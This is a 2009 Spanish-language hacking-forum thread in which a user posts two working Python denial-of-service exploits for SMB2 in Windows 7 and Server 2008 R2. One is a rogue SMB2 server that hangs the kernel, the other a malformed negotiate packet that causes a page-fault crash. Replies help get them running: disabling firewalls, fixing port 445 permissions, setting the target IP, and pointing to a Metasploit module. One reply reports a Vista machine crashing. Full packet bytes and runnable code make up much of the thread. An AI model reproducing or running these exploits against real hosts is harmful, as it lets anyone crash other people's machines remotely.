Remote Denial of Service en W7

Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

Remote Denial of Service en W7

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2

Autor

Tema: Remote Denial of Service en W7 (Leído 4,720 veces)

rockernault

Desconectado

Mensajes: 2.045

Linux User!!!

Remote Denial of Service en W7

« en: 18 Noviembre 2009, 03:34 »

veia este exploit, y me surgio la duda de como puedo explotarlo, ya estudie libros y libros de python, pero me falta algo, y no se que es..

Código:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

   def handle(self):

   print "Who:", self.client_address
   input = self.request.recv(1024)
   self.request.send(packet)
   self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()

#SDL FAILED

este es un code,

y este es el otro code, pero no se como hacerlo correr, tengo linux a la mano,

Código:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

si alguien me pudiera dar una mano.. ya instale toda la LAN con 3 computadoras con Windows 7 compartiendo archivos

saludos y gracias


« Última modificación: 18 Noviembre 2009, 04:29 por rockernault »	En línea

Littlehorse

All the world's a stage
Colaborador

Desconectado

Mensajes: 2.710

Nie Dam Sie

Re: Remote Denial of Service en W7

« Respuesta #1 en: 18 Noviembre 2009, 04:03 »

host = "IP_ADDR", 445

Citar

ya estudie libros y libros de python

No mientas mas


	En línea

@NeedOfSecurity

An expert is a man who has made all the mistakes which can be made, in a very narrow field.

rockernault

Desconectado

Mensajes: 2.045

Linux User!!!

Re: Remote Denial of Service en W7

« Respuesta #2 en: 18 Noviembre 2009, 04:07 »

no, la verdad apenas estoy empezando... :xD

pero me interesa bastante como podria hacerlo correr, ya compre el W7 y quiero ver si es posble explotar la vulnerabilidad en LAN..

ya tengo instalado el interprete de python para windows,

pero algo falta..

EDIT:

me tira esto la ejecucion del primer codigo esto, problema del windows o del code:

Código:

Traceback (most recent call last):
  File "C:\Users\Jorge\Documents\electronica\exploite.py", line 35, in <module>
   launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
  File "C:\Python26\lib\SocketServer.py", line 400, in __init__
   self.server_bind()
  File "C:\Python26\lib\SocketServer.py", line 411, in server_bind
   self.socket.bind(self.server_address)
  File "<string>", line 1, in bind
error: [Errno 10013] Intento de acceso a un socket no permitido por sus permisos de acceso

y la ejecucion del tercer code me da esto:

Código:

IDLE 2.6.4
>>> ================================ RESTART ================================
>>>
>>>

y la del segunda ejecucion del code 1 me dice "expected an intended loopback"


« Última modificación: 18 Noviembre 2009, 04:30 por rockernault »	En línea

Jaixon Jax

Desconectado

Mensajes: 855

Re: Remote Denial of Service en W7

« Respuesta #3 en: 18 Noviembre 2009, 04:19 »

Hombre esa linea esta poniendo un puerto 445 en escucha tal vez el firewall no te deja abrir el puerto

esta muy bonito el exploit

.....


	En línea

Tricalogo del buen forista:
1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....

rockernault

Desconectado

Mensajes: 2.045

Linux User!!!

Re: Remote Denial of Service en W7

« Respuesta #4 en: 18 Noviembre 2009, 04:27 »

ya lo escanee.. y tengo los puertos 135, 139 y 445 abiertos!!!

y ya no me da el error, pero no me congela el 7

son 2 exploits

uno de remote kernel crash y otro de BSOD por nonpaged area


	En línea

Jaixon Jax

Desconectado

Mensajes: 855

Re: Remote Denial of Service en W7

« Respuesta #5 en: 18 Noviembre 2009, 04:50 »

En el tercer code modificaste la propiedad host por la IP objetivo ? siendo una lan deberia ser la Ip local

...


	En línea

Littlehorse

All the world's a stage
Colaborador

Desconectado

Mensajes: 2.710

Nie Dam Sie

Re: Remote Denial of Service en W7

« Respuesta #6 en: 18 Noviembre 2009, 04:54 »

Tiene que ser un error en la forma en el que estas ejecutando los scripts o en la instalacion de Python.
Calculo que no habras tocado nada "Extra" en W7, pero a fin de cuentas SMB2.0 viene activado por defecto.
El tercer codigo funciona, los otros no los he probado.

Como estas ejecutando los scripts?

Cita de: Littlehorse en 18 Noviembre 2009, 04:03

host = "IP_ADDR", 445

Citar

#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
crash


	En línea

@NeedOfSecurity

An expert is a man who has made all the mistakes which can be made, in a very narrow field.

rockernault

Desconectado

Mensajes: 2.045

Linux User!!!

Re: Remote Denial of Service en W7

« Respuesta #7 en: 18 Noviembre 2009, 12:51 »

ya lo ejecute reemplazando la ip..

1.- lo copio en un bloc de notas,

Código:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "192.168.1.66", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

despues le cambio la extension a .py

con el IDLE abro el code ya coloreado

y luego le doy ejecutar, y no pasa nada, hasta el avira me dice que es una vulnerabilidad, pero como es evidente, esta desarmado en todas la computadoras en las que he hecho las pruebas

no le he movido al 7 nada, a excepcion de todos los puertos abiertos, 135, 139 445...

Citar

El tercer codigo funciona

como lo hiciste funcionar???


	En línea

Littlehorse

All the world's a stage
Colaborador

Desconectado

Mensajes: 2.710

Nie Dam Sie

Re: Remote Denial of Service en W7

« Respuesta #8 en: 18 Noviembre 2009, 13:38 »

Similar, solo que sin GUI.

Deshabilitaste los firewalls? (solo como detalle)

Y tambien decime que version de Windows 7 estas utilizando para las pruebas, y si es de 32 o de 64bits.

Podes utilizar Metasploit, si no me equivoco el nombre es "smb2_negotiate_pidhigh.rb"

Un saludo


	En línea

@NeedOfSecurity

An expert is a man who has made all the mistakes which can be made, in a very narrow field.

TRICKY

The "Tricky" ..
Colaborador

Desconectado

Mensajes: 1.602

Re: Remote Denial of Service en W7

« Respuesta #9 en: 18 Noviembre 2009, 15:37 »

Estas ejecutandolo como root?

Prueba

Saludos.


	En línea

"La envidia es una declaración de inferioridad"
Napoleón.

rockernault

Desconectado

Mensajes: 2.045

Linux User!!!

Re: Remote Denial of Service en W7

« Respuesta #10 en: 19 Noviembre 2009, 00:59 »

@Littlehorse

ya me he encargado del firewall de Windows y de Avira

Windows 7 RTM con algunas actualizaciones.. espero que eso no sea un problema

32bits

hmmm metasploit... suena interesante.. deja investigo...

@averno:

ya lo intente.. como root, permisos de ejecucion, etc y nada

saludos y gracias por la atencion


	En línea

Manulu

Desconectado

Mensajes: 20

Re: Remote Denial of Service en W7

« Respuesta #11 en: 19 Noviembre 2009, 06:37 »

yo no tengo aportes al tema como tal pero si alguno me puede iluminar y/o decirme como puedo compartir documentos entre Backtrack 4pf y Widows 7; Windows 7 si puede entrar a Backtrack si tengo una carpeta compartida pero viceversa no! cuando hago esto el puerto que escucha Comodo es ese el 445!

Citar

http://s189.photobucket.com/albums/z201/manuel_privado/BackTrack/?action=view&current=VidiWindows7.jpg

Citar

http://s189.photobucket.com/albums/z201/manuel_privado/BackTrack/?action=view&current=W8BackTrack.png

desde ahora gracias por alguna info!


	En línea

rockernault

Desconectado

Mensajes: 2.045

Linux User!!!

Re: Remote Denial of Service en W7

« Respuesta #12 en: 19 Noviembre 2009, 12:52 »

eh tio..

los temas son gratis!!!

asi que abre uno alla en Windows o en GNU/linux


	En línea

Karcrack

Desconectado

Mensajes: 2.191

Se siente observado ¬¬'

Re: Remote Denial of Service en W7

« Respuesta #13 en: 19 Noviembre 2009, 15:41 »

Prueba este codigo a ver si te va :huh:

Código:

http://www.advancevb.com.ar/?p=372

Esta en VB!


	En línea

rockernault

Desconectado

Mensajes: 2.045

Linux User!!!

Re: Remote Denial of Service en W7

« Respuesta #14 en: 19 Noviembre 2009, 22:43 »

emmm ya lo ejecute karcrack, pero solo afecta a la RC del 7

y no, no me crashea el 7...

pero el vista puff!!!

murio en cuanto aprete enter..

probando metasploit.. aver si jala


	En línea

Páginas: [1] 2

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	[Duda] ReDos(Regular expression Denial of Service) que causa en PHP Nivel Web	~ Yoya ~	4	991	10 Enero 2011, 22:12 por ~ Yoya ~